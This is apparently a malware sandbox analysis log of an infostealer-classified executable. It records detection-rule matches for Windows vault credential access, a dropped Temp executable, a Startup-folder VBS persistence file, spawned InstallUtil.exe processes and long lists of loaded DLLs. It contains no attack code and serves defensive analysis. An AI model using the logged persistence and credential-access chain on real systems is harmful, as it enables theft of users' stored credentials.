                        Source: rCHARTERREQUEST.exe, 00000000.00000002.1933402312.0000000006C10000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs rCHARTERREQUEST.exe
                        Source: rCHARTERREQUEST.exe, 00000000.00000002.1932083028.00000000069E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameKuijnxh.dll" vs rCHARTERREQUEST.exe
                        Source: rCHARTERREQUEST.exeBinary or memory string: OriginalFilenamereff.exe2 vs rCHARTERREQUEST.exe
                        Source: rCHARTERREQUEST.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                        Source: 7.2.ilsucsfth.exe.419edc0.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 0.2.rCHARTERREQUEST.exe.43fbca8.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 0.2.rCHARTERREQUEST.exe.43fbca8.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 7.2.ilsucsfth.exe.419edc0.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 5.2.InstallUtil.exe.540000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@10/4@2/3
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ilsucsfth.vbsJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeFile created: C:\Users\user\AppData\Local\Temp\ckuv.exeJump to behavior
                        Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ilsucsfth.vbs"
                        Source: rCHARTERREQUEST.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: rCHARTERREQUEST.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: rCHARTERREQUEST.exeReversingLabs: Detection: 21%
                        Source: rCHARTERREQUEST.exeVirustotal: Detection: 35%
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeFile read: C:\Users\user\Desktop\rCHARTERREQUEST.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\rCHARTERREQUEST.exe "C:\Users\user\Desktop\rCHARTERREQUEST.exe"
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeProcess created: C:\Users\user\AppData\Local\Temp\ckuv.exe "C:\Users\user\AppData\Local\Temp\ckuv.exe"
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                        Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ilsucsfth.vbs"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\ilsucsfth.exe "C:\Users\user\AppData\Roaming\ilsucsfth.exe"
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeProcess created: C:\Users\user\AppData\Local\Temp\ckuv.exe "C:\Users\user\AppData\Local\Temp\ckuv.exe" Jump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\ilsucsfth.exe "C:\Users\user\AppData\Roaming\ilsucsfth.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wtsapi32.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winsta.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dll
